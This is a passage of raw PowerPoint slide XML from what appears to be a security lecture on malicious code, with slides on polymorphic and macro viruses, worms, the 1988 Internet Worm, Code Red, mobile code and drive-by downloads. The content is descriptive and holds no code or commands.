                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>fect:</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>add 0 to register</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>subtract 0 from register</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>xor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0 with register</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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no-op</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="904875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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Polymorphic virus would pick randomly from among these instructions</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>24</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Macro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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iruses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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901065" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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virus composed of a sequence of instructions that are interpreted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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rather than executed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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directly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10"/>
                        </a:spcBef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Can infect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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either</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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executables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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or data files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60"/>
                        </a:spcBef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Independent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of machine</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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architecture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60"/>
                        </a:spcBef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But their e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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fects may be machine</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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dependent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60"/>
                        </a:spcBef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MS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-7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-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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ord, Excel,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>etc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="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can carry</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-4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-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>V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B macros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60"/>
                        </a:spcBef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Consider the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-4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-120" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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indows Metafile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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exploit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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>25</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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990850">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Compute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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-60" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>W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o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>rms</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1360805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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>program that copies itself from one computer to another</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="6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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Origins: distributed computations</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Segment:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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part of program copied</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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onto workstation</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1426845" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Segmen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t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processe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s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data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,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communicate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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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w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it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h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worm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-135" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’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s controller</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Any activity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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on workstation caused</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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segment to shut down</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>26</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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1706880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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Example: Internet </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-60" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>W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orm of 1988</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Robert Morris, Cornell graduate student</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="569595" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Used virus-like attack to inject instructions into running programs and run them</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="683895" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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2700" spc="-190" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o recove</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-110" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, one had to disconnect system from Internet and reboot</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="583565" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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2700" spc="-190" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o prevent re-infection, several critical programs had to be patched, recompiled, and reinstalled</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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280"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Analysts had to disassemble it to uncover function</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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20"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Disabled several thousand systems in 6 or so hours</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>27</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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799080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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Code</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Red</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1107440" marR="561975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11074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Infected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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Microsoft IIS through a bu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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fer overflow exploit.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="823595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11074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Probed other systems on “nearby”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-12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addresses looking for other servers to infect.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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First version defaced</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-3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-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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eb sites.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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Launched</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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DDOS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="30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attack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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on whitehouse.gov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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="415290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11074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Subsequent versions included</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5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-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rojan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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copy of IE and opened back doors into the system.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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>28</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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366694"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Mobile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Code</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1343660" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Programs that can be shipped unchanged</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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to a variety</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of platforms</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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878840" marR="1297305" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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spc="-114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T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0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ransmitted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="25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from a remote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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system to a local system and then executed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="20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on the local</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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system</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill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878840" marR="918845" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Often acts as a mechanism</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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for a virus, worm, or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rojan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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horse</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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878840" marR="994410" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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spc="-215" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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akes advantage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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of vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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to perform it </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ow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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-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-5" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>exploits</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" spc="-5" dirty="0" smtClean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dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>popular </a:t>
                      </a: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vehicles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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Java applets, Flash, PD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-245" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>F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, ActiveX, JavaScript and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5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VBScript</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>29</a:t>
                      </a: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99656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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>What?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Me</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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worry?</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1024255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1024255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Modern computing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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systems are quite complex.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1024255" marR="1002030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1024255" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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e operate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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at human speed; it is impossible to know everything</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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that goes on.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1024255" marR="1768475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1024255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Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-14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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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setup or install program for a software package.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1024255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1024255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Malicious code can do substantial harm.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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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747010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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Drive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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By</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Downloads</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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728980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Exploits browser vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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to download and install malware</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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on the system when the user views a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5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-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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eb page controlled</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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by the attacker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 panose="020B0604020202020204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In most cases does not actively</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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propagate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 panose="020B0604020202020204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Spreads when users visit the malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-3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-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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eb page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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>30</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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84035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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Rabbits</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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or</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
